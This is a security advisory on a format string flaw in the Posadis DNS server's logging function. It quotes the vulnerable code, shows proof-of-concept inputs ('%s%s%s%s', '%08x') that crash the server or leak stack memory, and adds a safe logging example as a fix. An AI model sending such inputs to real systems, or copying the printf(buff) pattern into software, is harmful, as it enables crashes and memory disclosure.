Posadis DNS Server Format String Vulnerability

Published: 2002-03-29
Updated: 2002-03-29
Severity: Medium
Threat level: Remote denial of service
Error type: Input validation error
Exploitation method: Server mode

Affected systems

Posadis DNS Server -m5pre1

Detailed description

The Posadis DNS server is a small, non-caching DNS server that runs on a variety of platforms. Its log_print function handles the log message incorrectly, which can lead to a format string attack. The problem is in log.cpp:

---
void log_print(message_log_level log_level, char *logmsg, ...) {
    char buff[4096];
    long tsecs;
    struct tm *tstruct;
    va_list args;

    /* compile buffer */
    tsecs = time(NULL);
    tstruct = localtime(&tsecs);
    sprintf(buff, "%04d/%02d/%02d %02d:%02d|", tstruct->tm_year + 1900,
            tstruct->tm_mon + 1, tstruct->tm_mday, tstruct->tm_hour,
            tstruct->tm_min);
    switch (log_level) {
        case LOG_LEVEL_INFO: strcat(buff, "INFO: "); break;
        case LOG_LEVEL_WARNING: strcat(buff, "WARNING: "); break;
        case LOG_LEVEL_ERROR: strcat(buff, "ERROR: "); break;
        case LOG_LEVEL_PANIC: strcat(buff, "PANIC: "); break;
    }
    va_start(args, logmsg);
    vsprintf(&buff[strlen(buff)], logmsg, args);
    va_end(args);
    strcat(buff, "\n");

    /* and print it to various targets */
    if (!no_stdout_log) printf(buff);       /* <-- heh */
    if (logfile) fprintf(logfile, buff);    /* <-- heh */
#ifdef _WIN32
    w32dlg_add_log_item(buff);
#endif
#ifdef HAVE_SYSLOG_H
    syslog(log_level, "%s", strchr(buff, '|') + 1);
#endif
}
---

The lines marked with arrows are vulnerable to format string attacks: the already formatted buffer is passed to printf and fprintf as the format string, so any conversion specifiers contained in the logged text are interpreted a second time.

Test code

[kkr@eightball src]$ ./posadis %s%s%s%s
Segmentation fault (core dumped)
[kkr@eightball src]$ ./posadis %08x
2002/03/27 01:53|PANIC: Unrecognized option: 4016814c

--begin posadis.conf
%08x
--end posadis.conf

[kkr@eightball src]$ ./posadis
2002/03/27 01:59|ERROR: posadis.conf:1: Unknown command 4016814c!
2002/03/27 01:59|PANIC: Loading posadis.conf failed!

Solution

None yet.

Related information

nick (kkr@dekode.org)
Reference: http://archives.neohapsis.com/archives/bugtraq/2002-03/0340.html
Related homepage: http://sourceforge.net/projects/posadis/
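
The advisory lists no fix, so the following is an added example (not Posadis code and not from the original report) of how a logger shaped like log_print can avoid both the second format pass and the unbounded vsprintf. The names clamp, format_log_line and emit_log_line are hypothetical, and the level is passed as a string instead of the project's message_log_level type.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>
#include <time.h>

/* snprintf/vsnprintf return the length they wanted; clamp to what fit. */
static size_t clamp(int wanted, size_t room)
{
    if (wanted < 0) return 0;
    return (size_t)wanted < room ? (size_t)wanted : room - 1;
}

/* Build "YYYY/MM/DD HH:MM|LEVEL: message\n" with every write bounded.
 * Returns the length stored in buf (message truncated if needed), -1 on error. */
static int format_log_line(char *buf, size_t size, const char *level,
                           const char *fmt, ...)
{
    time_t now = time(NULL);
    struct tm *t = localtime(&now);
    size_t cap, used;
    va_list args;

    if (size < 2 || t == NULL)
        return -1;
    cap = size - 1;                      /* reserve one byte for '\n' */
    used = clamp(snprintf(buf, cap, "%04d/%02d/%02d %02d:%02d|%s: ",
                          t->tm_year + 1900, t->tm_mon + 1, t->tm_mday,
                          t->tm_hour, t->tm_min, level), cap);
    va_start(args, fmt);                 /* fmt is a literal chosen by the caller */
    used += clamp(vsnprintf(buf + used, cap - used, fmt, args), cap - used);
    va_end(args);
    buf[used] = '\n';
    buf[used + 1] = '\0';
    return (int)used + 1;
}

/* The finished line is data: write it verbatim, never as a format string. */
static int emit_log_line(FILE *target, const char *line)
{
    return fputs(line, target) == EOF ? -1 : 0;
}

int main(void)
{
    char line[4096];
    /* Constructed input: the "%08x" argument from the test session above. */
    format_log_line(line, sizeof line, "PANIC", "Unrecognized option: %s", "%08x");
    return emit_log_line(stdout, line);
}
```

With this shape the "%08x" argument is printed literally instead of being expanded to a stack value, and an oversized message is truncated rather than written past the end of the buffer.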